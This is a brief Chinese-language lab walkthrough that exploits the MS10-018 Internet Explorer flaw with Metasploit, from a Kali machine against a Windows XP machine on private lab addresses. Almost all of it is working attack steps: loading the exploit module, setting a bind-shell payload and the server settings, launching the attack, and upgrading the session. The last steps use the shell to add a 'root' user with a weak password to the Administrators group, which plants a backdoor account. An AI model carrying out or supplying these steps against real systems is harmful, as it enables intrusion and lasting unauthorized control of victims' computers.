漏洞详情:https://technet.microsoft.com/library/security/ms10-018
一准备:
1:kali Linux系统 192.168.195.129
2:Windows XP系统 192.168.195.130
二:Kali Linux系统操作
1::msfconsole 启动metsploits 2:search ms10_018 搜索ms10_018 3:use exploit/windows/browser/ms10_018_ie_behaviors 启动ms10_018模块
1:set PAYLOAD windows/shell/bind_tcp 选定并设置攻击载荷 2:show options 查看所需参数
1:set SRVHOST 192.168.195.129(Kali的IP) 2:set URIPATH ms10_018.html 3:show options
1:exploit 尝试攻击
1:sessions 2:setg LHOST 192.168.195.129 3:sessions -u 1
1:sessions -i 1 与ID为1的控制会话进行交互 2:ipconfig 查看windows系统IP 3:net user root 123456 /add 添加root用户 4:net localgroup Administrator root /add 提升root用户权限至Administrator用户组
参考:http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson11/